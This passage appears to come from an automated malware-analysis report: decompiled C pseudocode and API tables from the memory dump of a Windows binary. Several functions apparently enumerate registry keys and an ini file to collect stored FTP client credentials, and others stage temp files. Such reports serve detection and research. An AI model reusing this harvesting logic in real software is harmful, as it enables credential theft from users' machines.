        								_t14 = E0040C3CD(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
        								if(_t14 != 0) {
        									_t14 = E00411A47(_t21, _t19, _t16);
        									if(_t14 == 0) {
        										L12:
        										_t14 = 0;
        										 *_t19 = 0;
        									} else {
        										if(_a4 == 0) {
        											_t14 = PathRenameExtensionW(_t19, L".dat");
        											if(_t14 == 0) {
        												goto L12;
        											}
        										}
        									}
        								}
        							}
        						}
        					}
        				}
        				return _t14;
        			}















        APIs
        • PathRenameExtensionW.SHLWAPI(?,.dat,?,00423900,00000000,00000032,?,0001FE38,00000000), ref: 00413515
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: ExtensionPathRename
        • String ID: .dat$SOFTWARE\Microsoft$i,A
        • API String ID: 3337224433-28984985
        • Opcode ID: 75d8868982719ba5872afc4e607f13765cf529c70fb03e8558f5c06fc8fd7ae9
        • Instruction ID: fec5c0bb27381fb112d7997189bb8eccaed89a606435f0d6f523627f76622cdf
        • Opcode Fuzzy Hash: 75d8868982719ba5872afc4e607f13765cf529c70fb03e8558f5c06fc8fd7ae9
        • Instruction Fuzzy Hash: ED018C70210209AADB21DF65CC81BEABBA8AF1078AF400127E904E26D1D73CDFC5C65E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00416B62(void* __edx) {
        				void _v108;
        				char _v120;
        				char _v212;
        				long _v216;
        				char _v224;
        				void* __esi;
        				void* _t8;
        				void* _t16;
        
        				_t16 = __edx;
        				_t8 = GetThreadDesktop(GetCurrentThreadId());
        				if(_t8 != 0) {
        					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
        					if(_t8 != 0 && _v216 == 0x4e) {
        						E00413140(0x2937498d,  &_v212, 0);
        						_t8 = E0040C233( &_v224,  &_v120, 0x4c);
        						if(_t8 == 0) {
        							_t8 = E00416770( &_v120, _t16, 0x423e80, _t8);
        							if(_t8 == 0) {
        								_t8 = E004169DB(0x423e80, 0);
        							} else {
        								 *0x4238a0 =  *0x4238a0 | 0x00000004;
        							}
        						}
        					}
        				}
        				return _t8;
        			}












        APIs
        • GetCurrentThreadId.KERNEL32 ref: 00416B6F
        • GetThreadDesktop.USER32(00000000), ref: 00416B76
        • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 00416B8F
          • Part of subcall function 00416770: TlsAlloc.KERNEL32(00423E80,00000000,0000018C,00000000,00000000), ref: 00416789
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Thread$AllocCurrentDesktopInformationObjectUser
        • String ID: N
        • API String ID: 454308152-1130791706
        • Opcode ID: b132268847051ef78de5c02699ec163819f7cc4247e6cd3863d6190bcd76a16f
        • Instruction ID: 952d7750dbf1165f1e04135e1955473ffa7228bf1100b92dbd6dd053766a642d
        • Opcode Fuzzy Hash: b132268847051ef78de5c02699ec163819f7cc4247e6cd3863d6190bcd76a16f
        • Instruction Fuzzy Hash: 6D01D4716083106BE610AB619D0AFE773AC5B00B18F41012FFA14DA1D0FB7DF944C69E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040883B(WCHAR* __ebx, void* __ecx, char _a4) {
        				void* __edi;
        				long _t3;
        				WCHAR* _t13;
        
        				_t13 = __ebx;
        				if( *0x422468 == 0) {
        					E0041349C(__ecx, 0x422468, 2);
        					 *((short*)(E0040C1FE(0x422670, 0x422468, E0040CD11(0x422468) + _t10) + 0x422670)) = 0;
        					_t3 = PathRemoveFileSpecW(0x422670);
        				}
        				if(_t13 != 0) {
        					E0040C563(_t3 | 0xffffffff, 0x422468, _t13);
        					_t3 = PathRenameExtensionW(_t13, L".tmp");
        				}
        				if(_a4 != 0 &&  *0x423b0c > 1) {
        					E004117C9(0x422670);
        					E0040F843(0x422670);
        					_t3 = GetFileAttributesW(0x422468);
        					if(_t3 != 0xffffffff) {
        						return E0040F843(0x422468);
        					}
        				}
        				return _t3;
        			}







        APIs
        • PathRemoveFileSpecW.SHLWAPI(00422670,00422670,00422468,00000000,00000002,00000000,00020000,00409335,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722), ref: 00408873
        • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00409335,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 0040888F
        • GetFileAttributesW.KERNEL32(00422468,00422670,00422670,00000000,00020000,00409335,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 004088B2
          • Part of subcall function 0041349C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423900,00000000,00000032,?,0001FE38,00000000), ref: 00413515
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
        • String ID: .tmp
        • API String ID: 3627892477-2986845003
        • Opcode ID: c074acea76838a3a525f989513e2a088a139ebab107649fab008df2878df7b3a
        • Instruction ID: 95485e6875358eb0062060ff729ba8969c7bf419bc17ea6f73b46d46e03f4739
        • Opcode Fuzzy Hash: c074acea76838a3a525f989513e2a088a139ebab107649fab008df2878df7b3a
        • Instruction Fuzzy Hash: 68F0622260021075E6213736AD89E7F2A598F91724F94827FF051B52E2DFBC8A4A876D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E004115C7(WCHAR* _a4) {
        				short _v524;
        				char _v1044;
        				void* __edi;
        				void* _t11;
        				void* _t19;
        				void* _t20;
        
        				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
        					L6:
        					return 0;
        				}
        				_t19 = 0;
        				while(1) {
        					_push(E0040D4FB());
        					_push(L"tmp");
        					_t18 =  &_v1044;
        					_t11 = E0040CEB5(_t10, 0x104,  &_v1044, L"%s%08x");
        					_t20 = _t20 + 0xc;
        					if(_t11 == 0xffffffff) {
        						goto L6;
        					}
        					if(E00411A47(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
        						_t19 = _t19 + 1;
        						if(_t19 < 0x64) {
        							continue;
        						}
        						goto L6;
        					} else {
        						return 1;
        					}
        				}
        				goto L6;
        			}










        APIs
        • GetTempPathW.KERNEL32(000000F6,?), ref: 004115DE
          • Part of subcall function 0040D4FB: GetTickCount.KERNEL32 ref: 0040D4FB
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00411630
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Path$CombineCountCreateDirectoryTempTick
        • String ID: %s%08x$tmp
        • API String ID: 1218007593-1196434543
        • Opcode ID: 20cbc349d140c808b721c45260f45de7f64a024c1d63df15a197477efceb4433
        • Instruction ID: a4ef2f51171834a63693a6aa5141bdaa3b6551edf68564199ef24a3d261b07ae
        • Opcode Fuzzy Hash: 20cbc349d140c808b721c45260f45de7f64a024c1d63df15a197477efceb4433
        • Instruction Fuzzy Hash: 6FF044B16002242BDB206B60CC46BEB3B2CCB01354F144133BF21F65F0D27A9ECA969C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004117C9(WCHAR* _a4) {
        				signed int _t4;
        				short _t9;
        				signed short _t10;
        				WCHAR* _t11;
        				WCHAR* _t12;
        				int _t18;
        
        				_t12 = _a4;
        				_t9 = 0;
        				_t11 = PathSkipRootW(_t12);
        				if(_t11 == 0) {
        					_t11 = _t12;
        				}
        				while(1) {
        					_t4 =  *_t11 & 0x0000ffff;
        					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
        						goto L5;
        					}
        					L11:
        					_t11 =  &(_t11[1]);
        					continue;
        					L5:
        					_t10 = _t4;
        					 *_t11 = 0;
        					if(GetFileAttributesW(_t12) == 0xffffffff) {
        						_t18 = CreateDirectoryW(_t12, 0);
        					}
        					if(_t18 == 0) {
        						L13:
        						return _t9;
        					} else {
        						if(_t10 == 0) {
        							_t9 = 1;
        							goto L13;
        						}
        						 *_t11 = _t10;
        						goto L11;
        					}
        				}
        			}










        APIs
        • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0040BA3E,?,?,?,?,?), ref: 004117D4
        • GetFileAttributesW.KERNEL32(?,?,00000000,0040BA3E,?,?,?,?,?), ref: 004117FC
        • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0040BA3E,?,?,?,?,?), ref: 0041180A
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: AttributesCreateDirectoryFilePathRootSkip
        • String ID: .exe
        • API String ID: 4231520044-4119554291
        • Opcode ID: a48f685c1e61191b0a468fc52961c7c22d5ab0c8ccaaeecbe1ad0c1de1d8f300
        • Instruction ID: 00fe3c16d6adcdb2383f2ee2e04148e8787900f175e2382c235a4672428e7b14
        • Opcode Fuzzy Hash: a48f685c1e61191b0a468fc52961c7c22d5ab0c8ccaaeecbe1ad0c1de1d8f300
        • Instruction Fuzzy Hash: AEF046365412005FC6302B2918446E7B3D8AE11BA0B658527FEE1E33B0D7389CC1C2AC
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040D9C9(void* __ecx) {
        				signed int _v8;
        				struct HINSTANCE__* _t7;
        
        				_v8 = _v8 & 0x00000000;
        				_t7 = GetModuleHandleW(L"kernel32.dll");
        				if(_t7 == 0) {
        					L4:
        					return _t7 & 0xffffff00 | _v8 != 0x00000000;
        				} else {
        					_t7 = GetProcAddress(_t7, "IsWow64Process");
        					if(_t7 == 0) {
        						goto L4;
        					} else {
        						_t7 = _t7->i(0xffffffff,  &_v8);
        						if(_t7 != 0) {
        							goto L4;
        						} else {
        							return 0;
        						}
        					}
        				}
        			}






        APIs
        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00412A32,00000000,00412F59), ref: 0040D9D6
        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040D9E6
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressHandleModuleProc
        • String ID: IsWow64Process$kernel32.dll
        • API String ID: 1646373207-3024904723
        • Opcode ID: 72172540c4693b7f3ac9a67153214643230d5682eb3c935ba15c3f89d9394480
        • Instruction ID: e23be5f8fdf82eea997bd001e4048c851a026c9a21dcc283b22dd534727be0b0
        • Opcode Fuzzy Hash: 72172540c4693b7f3ac9a67153214643230d5682eb3c935ba15c3f89d9394480
        • Instruction Fuzzy Hash: FDE04830714245B6DF0087E59D0AB9F37D89B01795F2402B9A011F20D0DA7CDA08992C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041C900(intOrPtr _a4, intOrPtr _a12) {
        				void* __esi;
        				void* _t6;
        				signed int _t7;
        
        				if(_a12 == 0x64 || _a12 == 0x33) {
        					EnterCriticalSection(0x42400c);
        					_t7 = E0041C2C7(_a4);
        					if(_t7 != 0xffffffff) {
        						_t7 = SetEvent( *(_t7 * 0x24 +  *0x423e7c + 4));
        					}
        					LeaveCriticalSection(0x42400c);
        					return _t7;
        				}
        				return _t6;
        			}







        APIs
        • EnterCriticalSection.KERNEL32(0042400C), ref: 0041C916
        • SetEvent.KERNEL32(?), ref: 0041C937
        • LeaveCriticalSection.KERNEL32(0042400C), ref: 0041C93E
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterEventLeave
        • String ID: 3
        • API String ID: 3094578987-1842515611
        • Opcode ID: e226af85c645ab1b693a96d19d21256a522d0146d1a4f8a44a9cf42006f70a81
        • Instruction ID: 0c9fc7bc4d9dbf22b0bed22b9ae3cda3e2d33042e0969e861264c8bd73819c1d
        • Opcode Fuzzy Hash: e226af85c645ab1b693a96d19d21256a522d0146d1a4f8a44a9cf42006f70a81
        • Instruction Fuzzy Hash: DCE09236104100EBC7206B35ED8889FBB64EBD6335701C57FF065A21B1C738C892CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00419920(char* __ecx, void* __edx, void* __eflags) {
        				void* _v8;
        				signed int _v12;
        				intOrPtr _v16;
        				int _v20;
        				int _v24;
        				intOrPtr _v28;
        				char _v32;
        				char* _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				char _v68;
        				char _v88;
        				char _v108;
        				char _v132;
        				char _v172;
        				short _v260;
        				short _v780;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t65;
        				intOrPtr _t92;
        				int _t104;
        				void* _t110;
        				intOrPtr _t112;
        				void* _t115;
        				int _t120;
        				void* _t125;
        				void* _t132;
        				void* _t135;
        				void* _t136;
        
        				_t119 = __edx;
        				_t118 = __ecx;
        				_t120 = 0;
        				E0040C275( &_v32,  &_v32, 0, 8);
        				_t65 = E0040C192(0xc1c);
        				_v16 = _t65;
        				if(_t65 == 0) {
        					L22:
        					if(_v28 <= _t120) {
        						return E0040C1C2(_v32);
        					}
        					return E00417504(_t119, _v32, 0xcb);
        				} else {
        					_v36 = _t65 + 0x3fc;
        					_v48 = 0x80000001;
        					_v44 = 0x80000002;
        					E004128DB(0x8a,  &_v260);
        					E004128DB(0x8b,  &_v88);
        					E004128DB(0x8c,  &_v132);
        					E004128DB(0x8d,  &_v68);
        					E004128DB(0x8e,  &_v108);
        					_v12 = 0;
        					do {
        						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
        							goto L20;
        						}
        						_v24 = _t120;
        						_v20 = 0x104;
        						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
        							L19:
        							RegCloseKey(_v8);
        							goto L20;
        						} else {
        							goto L4;
        						}
        						L17:
        						_v20 = 0x104;
        						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
        							L4:
        							_t122 = _v16;
        							_v24 = _v24 + 1;
        							_t92 = E004102E6(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
        							_v40 = _t92;
        							if(_t92 != 0xffffffff && _t92 != 0) {
        								_t132 = E004102E6(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
        								if(_t132 != 0xffffffff && _t132 != 0) {
        									_t124 = _v36;
        									_t104 = E004102E6(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
        									_v20 = _t104;
        									if(_t104 != 0xffffffff && _t104 != 0 && E00419866(_t119, _t124, _t132 + _v40) > 0) {
        										_t125 = E0041039C(_v8, _t118,  &_v780,  &_v132);
        										if(_t125 < 1 || _t125 > 0xffff) {
        											_t125 = 0x15;
        										}
        										_t134 =  &_v172;
        										_t110 = 0x55;
        										E004128DB(_t110,  &_v172);
        										_t112 = _v16;
        										_t118 = _v36;
        										_push(_t125);
        										_push(_t112);
        										_push(_t118);
        										_push(_t112 + 0x1fe);
        										_t119 = 0x311;
        										_t126 = _t118 + 0x1fe;
        										_t115 = E0040CEB5(_t134, 0x311, _t118 + 0x1fe, _t134);
        										_t136 = _t136 + 0x14;
        										if(_t115 > 0) {
        											_t118 =  &_v32;
        											if(E0040C5B6(_t115,  &_v32, _t126) != 0) {
        												_v28 = _v28 + 1;
        											}
        										}
        									}
        								}
        							}
        							goto L17;
        						} else {
        							_t120 = 0;
        							goto L19;
        						}
        						L20:
        						_v12 = _v12 + 1;
        					} while (_v12 < 2);
        					E0040C1C2(_v16);
        					goto L22;
        				}
        			}



































        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004199C6
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 004199F1
        • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 00419B27
          • Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00419B14
          • Part of subcall function 004102E6: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,004174C9,?,?,00000104), ref: 0041037C
          • Part of subcall function 0041039C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041C4D7,?,?), ref: 004103B4
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Open$Enum$CloseEnvironmentExpandStrings
        • String ID:
        • API String ID: 2343474859-0
        • Opcode ID: 4845545987d5e0baa56cbb90ff87f11b664b7fac93f339b0d40e388de2469a0c
        • Instruction ID: ef2fa044a2620454df6a460e9bbcfa83b5a2bdf68600020c52b3c584dfe045b9
        • Opcode Fuzzy Hash: 4845545987d5e0baa56cbb90ff87f11b664b7fac93f339b0d40e388de2469a0c
        • Instruction Fuzzy Hash: B5516E72D00118ABDB10EBE5CD85AEFB7BCEF48344F10016AE905F3291DB789E858B64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E00419EB4(char* __ecx, void* __eflags) {
        				void* _v8;
        				int _v12;
        				intOrPtr _v16;
        				int* _v20;
        				intOrPtr _v24;
        				char _v28;
        				char* _v32;
        				char _v40;
        				char _v52;
        				char _v64;
        				char _v76;
        				char _v116;
        				short _v180;
        				short _v700;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t55;
        				int _t81;
        				int _t89;
        				int _t93;
        				void* _t99;
        				intOrPtr _t101;
        				void* _t104;
        				int* _t109;
        				char* _t113;
        				void* _t114;
        				void* _t122;
        
        				_t107 = __ecx;
        				_t109 = 0;
        				E0040C275( &_v28,  &_v28, 0, 8);
        				_t55 = E0040C192(0xc1c);
        				_v16 = _t55;
        				if(_t55 == 0) {
        					return _t55;
        				}
        				_v32 = _t55 + 0x3fc;
        				E004128DB(0x97,  &_v180);
        				E004128DB(0x98,  &_v64);
        				E004128DB(0x99,  &_v76);
        				E004128DB(0x9a,  &_v52);
        				E004128DB(0x9b,  &_v40);
        				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
        					L20:
        					E0040C1C2(_v16);
        					if(_v24 <= _t109) {
        						return E0040C1C2(_v28);
        					}
        					return E00417504(0x311, _v28, 0xcb);
        				}
        				_v20 = 0;
        				_v12 = 0x104;
        				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
        					L19:
        					RegCloseKey(_v8);
        					goto L20;
        				} else {
        					do {
        						_t111 = _v16;
        						_v20 = _v20 + 1;
        						_t81 = E004102E6(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
        						_v12 = _t81;
        						if(_t81 != 0xffffffff && _t81 != 0) {
        							_t89 = E004102E6(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
        							_v12 = _t89;
        							if(_t89 != 0xffffffff && _t89 != 0) {
        								_t113 = _v32;
        								_t93 = E004102E6(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
        								_v12 = _t93;
        								if(_t93 != 0xffffffff && _t93 != 0) {
        									_t107 = _t113;
        									if(E0040CD11(_t113) > 0) {
        										_t114 = E0041039C(_v8, _t107,  &_v700,  &_v76);
        										if(_t114 < 1 || _t114 > 0xffff) {
        											_t114 = 0x15;
        										}
        										_t121 =  &_v116;
        										_t99 = 0x55;
        										E004128DB(_t99,  &_v116);
        										_t101 = _v16;
        										_t107 = _v32;
        										_push(_t114);
        										_push(_t101);
        										_push(_t107);
        										_push(_t101 + 0x1fe);
        										_t115 = _t107 + 0x1fe;
        										_t104 = E0040CEB5(_t121, 0x311, _t107 + 0x1fe, _t121);
        										_t122 = _t122 + 0x14;
        										if(_t104 > 0) {
        											_t107 =  &_v28;
        											if(E0040C5B6(_t104,  &_v28, _t115) != 0) {
        												_v24 = _v24 + 1;
        											}
        										}
        									}
        								}
        							}
        						}
        						_v12 = 0x104;
        					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
        					_t109 = 0;
        					goto L19;
        				}
        			}































        APIs
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 00419F42
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00419F6D
        • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0041A0A4
          • Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0041A091
          • Part of subcall function 004102E6: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,004174C9,?,?,00000104), ref: 0041037C
          • Part of subcall function 0041039C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041C4D7,?,?), ref: 004103B4
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Open$Enum$CloseEnvironmentExpandStrings
        • String ID:
        • API String ID: 2343474859-0
        • Opcode ID: 805b4e63e350209c1db1db539d2733eeb2523081abf0c9f6d662c3df14396207
        • Instruction ID: eff8ac6721701ccf3497b70151afb963879ec6b4e3cb6007f39cf6e9598aacda
        • Opcode Fuzzy Hash: 805b4e63e350209c1db1db539d2733eeb2523081abf0c9f6d662c3df14396207
        • Instruction Fuzzy Hash: DB511F72900108ABEB20ABE5CD85AEFBBBDEB48304F140166F505F3291D7389A958B65
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E00404CE2(void* __eflags, intOrPtr _a4) {
        				signed int _v5;
        				short _v20;
        				char _v40;
        				char _v60;
        				short _v84;
        				char _v112;
        				char _v144;
        				short _v664;
        				char _v1184;
        				short _v1704;
        				char _v2224;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t31;
        				long _t33;
        				void* _t36;
        				void* _t42;
        				void* _t44;
        				void* _t46;
        				long _t50;
        				short* _t58;
        				char* _t65;
        				short _t66;
        				void* _t67;
        				WCHAR* _t70;
        				long _t77;
        
        				_t31 = 0x2a;
        				E004128DB(_t31,  &_v144);
        				_t33 =  &_v1184;
        				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
        				if(_t33 == 0) {
        					_t33 = E00411A47( &_v144,  &_v1184,  &_v1184);
        					if(_t33 != 0) {
        						_t36 = 0x2c;
        						E004128DB(_t36,  &_v112);
        						_t33 = E00411A47( &_v112,  &_v1704,  &_v1184);
        						if(_t33 != 0) {
        							_t33 = GetFileAttributesW( &_v1704);
        							if(_t33 != 0xffffffff) {
        								_t42 = 0x2d;
        								E004128DB(_t42,  &_v60);
        								_t44 = 0x2e;
        								E004128DB(_t44,  &_v84);
        								_t46 = 0x2f;
        								E004128DB(_t46,  &_v20);
        								_v5 = 0;
        								while(1) {
        									_push(_v5 & 0x000000ff);
        									_push( &_v60);
        									_t67 = 0xa;
        									_t70 =  &_v40;
        									_t50 = E0040CEB5( &_v60, _t67, _t70);
        									if(_t50 < 1) {
        										break;
        									}
        									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
        									_t77 = _t50;
        									if(_t77 == 0xffffffff) {
        										break;
        									}
        									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
        									if(_t50 == 0) {
        										L17:
        										_v5 = _v5 + 1;
        										if(_v5 < 0xfa) {
        											continue;
        										}
        										break;
        									}
        									_t58 =  &_v664;
        									if(_v664 == 0) {
        										L12:
        										if(_t77 != 1) {
        											_t65 =  &_v664;
        											L16:
        											_t50 = E00404E69(0, _t65, _a4, _t90);
        											if(_t50 == 0) {
        												break;
        											}
        											goto L17;
        										}
        										_t50 = E00411A47( &_v664,  &_v2224,  &_v1184);
        										_t90 = _t50;
        										if(_t50 == 0) {
        											goto L17;
        										}
        										_t65 =  &_v2224;
        										goto L16;
        									} else {
        										goto L9;
        									}
        									do {
        										L9:
        										if( *_t58 == 0x2f) {
        											_t66 = 0x5c;
        											 *_t58 = _t66;
        										}
        										_t58 = _t58 + 2;
        									} while ( *_t58 != 0);
        									goto L12;
        								}
        								return _t50;
        							}
        						}
        					}
        				}
        				return _t33;
        			}































        APIs
        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00404D09
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 00404D5D
        • GetPrivateProfileIntW.KERNEL32 ref: 00404DC0
        • GetPrivateProfileStringW.KERNEL32 ref: 00404DEC
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: PathPrivateProfile$AttributesCombineFileFolderString
        • String ID:
        • API String ID: 1702184609-0
        • Opcode ID: 48df2ede0ccee2610d077ad7ed275d9e407c8fc57fa9cfad85f99e9e5c887f17
        • Instruction ID: 2eb1ec381ca5b5d3fe046f8f66d1e3769d0e0abcf35a64cbbc00f55f96f00cb9
        • Opcode Fuzzy Hash: 48df2ede0ccee2610d077ad7ed275d9e407c8fc57fa9cfad85f99e9e5c887f17
        • Instruction Fuzzy Hash: 66419DB2900218AADF10EAA4CD85ADB777CAB85354F0001A7F614F71D1D7749E898B98
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?), ref: 0041267B
        • #8.OLEAUT32(?), ref: 004126C7
        • #2.WS2_32(?), ref: 004126D7
        • #9.OLEAUT32(?), ref: 00412710
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CreateInstance
        • String ID:
        • API String ID: 542301482-0
        • Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
        • Instruction ID: 7f1a1467a4451a704ff3fd5875912cb7084ff34774e09a2e1ee7c25f57436fa8
        • Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
        • Instruction Fuzzy Hash: 05218070900224AFCB11DBA4CDC8EEF7BB8EF09750F0405A6F916EB291D7B59944CBA5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00412179(signed int __edx, void** __esi, void* _a4, signed int _a8) {
        				char _v5;
        				long _v12;
        				void _v20;
        				signed int _v24;
        				signed int _v28;
        				signed int _v32;
        				signed int _v36;
        				signed int _t26;
        				signed int _t29;
        				signed int _t46;
        				void** _t48;
        
        				_t48 = __esi;
        				_t46 = __edx;
        				_v5 = 0;
        				if(_a8 <= 0xa00000) {
        					_t26 = E004114C6( *__esi);
        					_v36 = _t26;
        					_v32 = _t46;
        					if((_t26 & _t46) != 0xffffffff && E004114A6( *__esi, 0, 0, 2) != 0) {
        						_t29 = E004114C6( *__esi);
        						_v28 = _t29;
        						_v24 = _t46;
        						if((_t29 & _t46) != 0xffffffff) {
        							E0040C275( &_v20,  &_v20, 0, 5);
        							_v20 = __esi[4] ^ _a8;
        							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
        								E004114A6( *_t48, _v28, _v24, 0);
        								SetEndOfFile( *_t48);
        							} else {
        								_v5 = 1;
        							}
        						}
        						FlushFileBuffers( *_t48);
        						E004114A6( *_t48, _v36, _v32, 0);
        					}
        				}
        				return _v5;
        			}















        APIs
